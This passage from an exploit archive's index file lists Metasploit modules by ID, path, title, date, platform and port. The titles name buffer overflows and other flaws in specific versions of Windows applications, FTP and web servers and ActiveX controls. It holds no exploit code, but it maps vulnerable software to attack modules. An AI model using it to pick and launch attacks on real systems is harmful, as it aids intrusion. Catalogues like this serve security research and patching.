Overflow",2010-09-20,Metasploit,windows,remote,0 +16605,platforms/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download",2010-09-20,Metasploit,windows,remote,0 +16606,platforms/windows/local/16606.rb,"Adobe Collab.getIcon() Buffer Overflow (1)",2010-04-30,Metasploit,windows,local,0 +16607,platforms/windows/remote/16607.rb,"WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16608,platforms/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata (in_mp3.dll) - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16612,platforms/windows/remote/16612.rb,"Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",2010-09-20,Metasploit,windows,remote,0 +16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)",2010-09-20,Metasploit,windows,local,0 +16615,platforms/windows/local/16615.rb,"Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption",2010-04-30,Metasploit,windows,local,0 +16616,platforms/windows/remote/16616.rb,"SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16617,platforms/windows/local/16617.rb,"VUPlayer - M3U Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16619,platforms/windows/local/16619.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 +16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow Exploit (SEH)",2011-01-08,Metasploit,windows,local,0 +16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow",2010-12-16,Metasploit,windows,local,0 +16622,platforms/windows/local/16622.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun (2)",2010-09-25,Metasploit,windows,local,0 +16623,platforms/windows/local/16623.rb,"Adobe - Doc.media.newPlayer Use After Free (2)",2010-09-25,Metasploit,windows,local,0 +16624,platforms/windows/local/16624.rb,"Adobe util.printf() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 +16625,platforms/windows/local/16625.rb,"Microsoft Excel Malformed FEATHEADER Record",2010-09-25,Metasploit,windows,local,0 +16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - (PLS File) Stack Buffer Overflow",2010-01-28,Metasploit,windows,local,0 +16627,platforms/windows/local/16627.rb,"UltraISO CUE File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 +16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16629,platforms/windows/local/16629.rb,"VideoLAN VLC TiVo Buffer Overflow",2011-02-02,Metasploit,windows,local,0 +16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (1)",2010-09-25,Metasploit,windows,local,0 +16632,platforms/windows/local/16632.rb,"ACDSee - XPM File Section Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16634,platforms/windows/local/16634.rb,"Free Download Manager Torrent Parsing Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16635,platforms/windows/remote/16635.rb,"activePDF WebGrabber ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - (PLS File) Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16637,platforms/windows/local/16637.rb,"VideoLAN VLC MKV Memory Corruption",2011-02-08,Metasploit,windows,local,0 +16638,platforms/windows/remote/16638.rb,"DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow",2010-09-25,Metasploit,windows,remote,0 +16639,platforms/windows/remote/16639.rb,"McAfee Remediation Client ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16640,platforms/windows/local/16640.rb,"FeedDemon <= 3.1.0.12 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow",2010-09-25,Metasploit,windows,remote,0 +16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote GROUPNAME Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow",2010-04-05,Metasploit,windows,local,0 +16645,platforms/windows/local/16645.rb,"URSoft W32Dasm Disassembler Function Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 +16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (2)",2010-09-25,Metasploit,windows,local,0 +16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit",2010-09-25,Metasploit,windows,remote,0 +16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (2)",2010-09-25,Metasploit,windows,local,0 +16651,platforms/windows/local/16651.rb,"AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,Metasploit,windows,local,0 +16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,Metasploit,windows,local,0 +16654,platforms/windows/local/16654.rb,"Orbital Viewer - ORB File Parsing Buffer Overflow",2010-03-09,Metasploit,windows,local,0 +16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,Metasploit,windows,local,0 +16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow",2010-09-25,Metasploit,aix,dos,0 +16658,platforms/windows/local/16658.rb,"VUPlayer - CUE Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16659,platforms/aix/local/16659.rb,"Cain & Abel <= 4.9.24 - RDP Buffer Overflow",2010-11-24,Metasploit,aix,local,0 +16660,platforms/windows/local/16660.rb,"Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow",2011-02-08,Metasploit,windows,local,0 +16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - pls Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow Exploit",2010-09-25,Metasploit,windows,local,0 +16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16666,platforms/windows/local/16666.rb,"UltraISO CCD File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 +16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Remote Code Execution",2010-11-01,Metasploit,windows,local,0 +16668,platforms/windows/local/16668.rb,"BACnet OPC Client Buffer Overflow",2010-11-14,Metasploit,windows,local,0 +16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16670,platforms/windows/local/16670.rb,"Adobe Acrobat Bundled LibTIFF Integer Overflow",2010-09-25,Metasploit,windows,local,0 +16671,platforms/windows/local/16671.rb,"Adobe PDF Embedded EXE Social Engineering",2010-12-16,Metasploit,windows,local,0 +16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption Exploit (2)",2010-09-25,Metasploit,windows,local,0 +16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16674,platforms/windows/local/16674.rb,"Adobe Collab.collectEmailInfo() Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner (DBR File) Path Buffer Overflow",2010-09-20,Metasploit,windows,local,0 +16676,platforms/windows/local/16676.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (2)",2011-01-08,Metasploit,windows,local,0 +16677,platforms/windows/local/16677.rb,"CA Antivirus Engine CAB Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16678,platforms/windows/local/16678.rb,"VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow",2010-09-20,Metasploit,windows,local,0 +16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow",2011-01-08,Metasploit,windows,local,0 +16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic VBP Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16681,platforms/windows/local/16681.rb,"Adobe Collab.getIcon() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 +16682,platforms/windows/local/16682.rb,"Adobe PDF Escape EXE Social Engineering (No JavaScript)",2010-12-16,Metasploit,windows,local,0 +16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (3)",2010-09-25,Metasploit,windows,local,0 +16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .M3U Buffer Overflow",2010-04-30,Metasploit,windows,local,0 +16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback ActiveX Control Buffer Overflow",2010-11-05,Metasploit,windows,remote,0 +16686,platforms/windows/local/16686.rb,"Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,Metasploit,windows,local,0 +16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)",2010-09-25,Metasploit,windows,local,0 +16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - (PLS File) Stack Buffer Overflow",2010-11-24,Metasploit,windows,local,0 +16689,platforms/windows/remote/16689.rb,"CCProxy <= 6.2 - Telnet Proxy Ping Overflow",2010-04-30,Metasploit,windows,remote,23 +16690,platforms/windows/remote/16690.rb,"Qbik WinGate WWW Proxy Server URL Processing Overflow",2010-09-20,Metasploit,windows,remote,80 +16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy Host Header Overflow",2010-07-12,Metasploit,windows,remote,80 +16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow",2010-09-20,Metasploit,windows,remote,3128 +16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 - 'secure' Overflow (Windows)",2010-09-20,Metasploit,windows,remote,7787 +16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 beta 5 - Buffer Overflow",2010-09-20,Metasploit,windows,remote,26000 +16695,platforms/windows/remote/16695.rb,"Medal Of Honor Allied Assault getinfo Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,12203 +16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,1533 +16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",2010-11-11,Metasploit,windows,remote,80 +16698,platforms/windows/remote/16698.rb,"Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,Metasploit,windows,remote,0 +16699,platforms/windows/remote/16699.rb,"Outlook ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,Metasploit,windows,remote,0 +16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution",2010-09-20,Metasploit,windows,remote,0 +16701,platforms/windows/remote/16701.rb,"MySQL yaSSL - SSL Hello Message Buffer Overflow (Windows)",2010-05-09,Metasploit,windows,remote,3306 +16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow",2010-04-30,Metasploit,windows,remote,21 +16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server - Input Overflow",2010-10-05,Metasploit,windows,remote,0 +16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 +16705,platforms/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 +16706,platforms/windows/remote/16706.rb,"War-FTPD 1.65 Password Overflow",2010-07-03,Metasploit,windows,remote,0 +16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 Username Overflow",2010-07-03,Metasploit,windows,remote,0 +16708,platforms/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow",2010-04-30,Metasploit,windows,remote,0 +16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 Banner Remote Buffer Overflow Exploit",2010-07-03,Metasploit,windows,remote,0 +16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 PASV Remote Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16711,platforms/windows/remote/16711.rb,"EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0 +16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 - Format String",2010-06-22,Metasploit,windows,remote,21 +16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g - (MKD) Command Buffer Overflow",2011-02-23,Metasploit,windows,remote,0 +16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB FTP UNLOCK Overflow (Win32)",2010-10-05,Metasploit,windows,remote,2100 +16715,platforms/windows/remote/16715.rb,"Serv-U FTPD - MDTM Overflow",2010-09-20,Metasploit,windows,remote,21 +16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0 +16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow",2010-04-30,Metasploit,windows,remote,0 +16718,platforms/windows/remote/16718.rb,"Xlink FTP Server Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16719,platforms/windows/remote/16719.rb,"WS-FTP Server 5.03 MKD Overflow",2010-10-05,Metasploit,windows,remote,21 +16720,platforms/windows/remote/16720.rb,"FTP Synchronizer Professional 4.0.73.274 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 +16721,platforms/windows/remote/16721.rb,"FileWrangler 5.30 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 +16722,platforms/windows/remote/16722.rb,"Xlink FTP Client Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon PORT Command Memory Corruption",2010-09-20,Metasploit,windows,remote,0 +16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - Username Overflow",2010-07-03,Metasploit,windows,remote,0 +16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,Metasploit,windows,remote,0 +16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 +16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve FTP PORT Buffer Overflow",2010-04-30,Metasploit,windows,remote,5554 +16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 +16729,platforms/windows/remote/16729.rb,"SlimFTPd LIST Concatenation Overflow",2010-10-05,Metasploit,windows,remote,0 +16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Username Overflow",2010-09-20,Metasploit,windows,remote,0 +16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB FTP PASS Overflow (Win32)",2010-04-30,Metasploit,win_x86,remote,0 +16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0 +16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version",2010-04-30,Metasploit,windows,remote,21 +16734,platforms/windows/remote/16734.rb,"EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow",2010-08-03,Metasploit,windows,remote,0 +16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow",2010-10-05,Metasploit,windows,remote,0 +16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 +16737,platforms/windows/remote/16737.rb,"EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Win32) Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0 +16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit",2010-04-30,Metasploit,windows,remote,21 +16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server NLST Response Overflow",2010-11-12,Metasploit,windows,remote,21 +16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 SIZE Overflow",2010-06-22,Metasploit,windows,remote,0 +16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow",2010-05-09,Metasploit,windows,remote,0 +16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 +16744,platforms/windows/remote/16744.rb,"Computer Associates License Client GETCONFIG Overflow",2010-09-20,Metasploit,windows,remote,10203 +16745,platforms/windows/remote/16745.rb,"Computer Associates License Server GETCONFIG Overflow",2010-09-20,Metasploit,windows,remote,10202 +16746,platforms/windows/remote/16746.rb,"SentinelLM UDP Buffer Overflow",2010-05-09,Metasploit,windows,remote,5093 +16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service Path Overflow",2010-05-09,Metasploit,windows,remote,2103 +16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)",2010-07-25,Metasploit,windows,remote,0 +16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface Overflow",2011-01-11,Metasploit,windows,remote,0 +16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service DNS Name Path Overflow",2010-07-25,Metasploit,windows,remote,0 +16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow",2010-04-30,Metasploit,win_x86,remote,0 +16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite - LDAP protocol Buffer Overflow",2010-02-15,Metasploit,windows,remote,80 +16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server If-Modified-Since Overflow",2010-08-25,Metasploit,windows,remote,80 +16754,platforms/windows/remote/16754.rb,"Minishare 1.4.1 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 +16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload",2010-10-19,Metasploit,windows,remote,8080 +16756,platforms/windows/remote/16756.rb,"Sambar 6 - Search Results Buffer Overflow",2010-02-13,Metasploit,windows,remote,80 +16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,Metasploit,windows,remote,8300 +16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,Metasploit,windows,remote,9999 +16759,platforms/win_x86/remote/16759.rb,"SHTTPD <= 1.34 - URI-Encoded POST Request Overflow (Win32)",2010-05-09,Metasploit,win_x86,remote,0 +16760,platforms/windows/remote/16760.rb,"Private Wire Gateway - Buffer Overflow",2010-04-30,Metasploit,windows,remote,80 +16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 - EXT.dll Buffer Overflow",2010-07-07,Metasploit,windows,remote,80 +16762,platforms/windows/remote/16762.rb,"BEA WebLogic JSESSIONID Cookie Value Overflow",2010-07-03,Metasploit,windows,remote,80 +16763,platforms/win_x86/remote/16763.rb,"Icecast <= 2.0.1 - Header Overwrite (Win32)",2010-04-30,Metasploit,win_x86,remote,8000 +16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)",2010-05-09,Metasploit,windows,remote,0 +16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM Database Parameter Overflow",2010-09-20,Metasploit,windows,remote,9999 +16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,8080 +16767,platforms/windows/remote/16767.rb,"IA WebMail 3.x - Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 +16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan Remote Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow",2010-07-13,Metasploit,windows,remote,8008 +16770,platforms/windows/remote/16770.rb,"Savant 3.1 Web Server - Overflow",2010-10-04,Metasploit,windows,remote,0 +16771,platforms/windows/remote/16771.rb,"EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow",2010-08-17,Metasploit,windows,remote,8080 +16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server Authentication Request Handling Buffer Overflow",2010-08-06,Metasploit,windows,remote,80 +16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server Host Header Overflow",2010-05-09,Metasploit,windows,remote,8028 +16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0 +16775,platforms/windows/webapps/16775.rb,"Rhinosoft Serv-U Session Cookie Buffer Overflow",2010-03-10,Metasploit,windows,webapps,0 +16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin USER Buffer Overflow",2010-02-15,Metasploit,windows,remote,0 +16777,platforms/windows/remote/16777.rb,"Free Download Manager Remote Control Server Buffer Overflow",2010-07-13,Metasploit,windows,remote,80 +16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow",2010-12-15,Metasploit,windows,remote,18881 +16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway Buffer Overflow",2010-05-09,Metasploit,windows,remote,8800 +16780,platforms/cgi/webapps/16780.rb,"HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow",2010-11-11,Metasploit,cgi,webapps,0 +16781,platforms/windows/remote/16781.rb,"MailEnable Authorization Header Buffer Overflow",2010-07-07,Metasploit,windows,remote,0 +16782,platforms/windows/remote/16782.rb,"Apache Win32 Chunked Encoding",2010-07-07,Metasploit,windows,remote,0 +16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot Overflow",2010-09-20,Metasploit,win_x86,remote,0 +16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,Metasploit,multiple,remote,80 +16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration Buffer Overflow",2010-11-24,Metasploit,windows,remote,80 +16786,platforms/windows/remote/16786.rb,"PeerCast <= 0.1216 URL Handling Buffer Overflow (Win32)",2010-09-20,Metasploit,windows,remote,7144 +16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,Metasploit,windows,remote,0 +16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execute",2010-11-24,Metasploit,cfm,webapps,0 +16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload and Execute",2010-11-24,Metasploit,multiple,remote,8080 +16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow",2010-05-09,Metasploit,windows,dos,8080 +16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM GET Buffer Overflow",2010-05-09,Metasploit,windows,remote,9999 +16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs webquery.dll Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,80 +16794,platforms/windows/remote/16794.rb,"HTTPDX - tolog() Function Format String (2)",2010-08-25,Metasploit,windows,remote,80 +16795,platforms/cgi/webapps/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow",2010-05-09,Metasploit,cgi,webapps,0 +16796,platforms/windows/remote/16796.rb,"BEA Weblogic Transfer-Encoding Buffer Overflow",2010-07-08,Metasploit,windows,remote,80 +16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16798,platforms/windows/remote/16798.rb,"Apache mod_jk 1.2.20 - Buffer Overflow",2010-07-25,Metasploit,windows,remote,0 +16799,platforms/windows/remote/16799.rb,"HTTPDX h_handlepeer() Function Buffer Overflow",2010-07-26,Metasploit,windows,remote,0 +16800,platforms/windows/remote/16800.rb,"Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow",2010-06-11,Metasploit,windows,remote,8000 +16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway Debug Mode Buffer Overflow",2010-04-30,Metasploit,windows,remote,5250 +16802,platforms/windows/remote/16802.rb,"Webster HTTP Server GET Buffer Overflow",2010-11-03,Metasploit,windows,remote,0 +16803,platforms/windows/remote/16803.rb,"Alt-N SecurityGateway username Buffer Overflow",2010-07-07,Metasploit,windows,remote,4000 +16804,platforms/windows/remote/16804.rb,"Belkin Bulldog Plus Web Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 +16805,platforms/windows/remote/16805.rb,"HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 +16806,platforms/windows/remote/16806.rb,"BadBlue 2.72b PassThru Buffer Overflow",2010-07-08,Metasploit,windows,remote,0 +16807,platforms/windows/remote/16807.rb,"InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow",2010-07-12,Metasploit,windows,remote,57772 +16808,platforms/windows/remote/16808.rb,"NaviCOPA 2.0.1 URL Handling Buffer Overflow",2010-07-12,Metasploit,windows,remote,80 +16809,platforms/win_x86/remote/16809.rb,"Oracle 9i XDB HTTP PASS Overflow (Win32)",2010-09-20,Metasploit,win_x86,remote,8080 +16810,platforms/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow",2010-09-20,Metasploit,windows,remote,443 +16811,platforms/windows/webapps/16811.rb,"TrackerCam PHP Argument Buffer Overflow",2010-05-09,Metasploit,windows,webapps,8090 +16812,platforms/windows/remote/16812.rb,"MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow",2010-07-01,Metasploit,windows,remote,3000 +16813,platforms/windows/remote/16813.rb,"Novell NetMail <= 3.52d NMAP STOR Buffer Overflow",2010-05-09,Metasploit,windows,remote,689 +16814,platforms/windows/remote/16814.rb,"Novell GroupWise Messenger Client Buffer Overflow",2010-06-22,Metasploit,windows,remote,8300 +16815,platforms/windows/remote/16815.rb,"Novell ZENworks 6.5 Desktop/Server Management Overflow",2010-07-25,Metasploit,windows,remote,0 +16816,platforms/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 Username Buffer Overflow",2010-06-22,Metasploit,windows,remote,23 +16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server <= 5.0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,2380 +16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 +16819,platforms/windows/remote/16819.rb,"SoftiaCom WMailserver 1.0 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 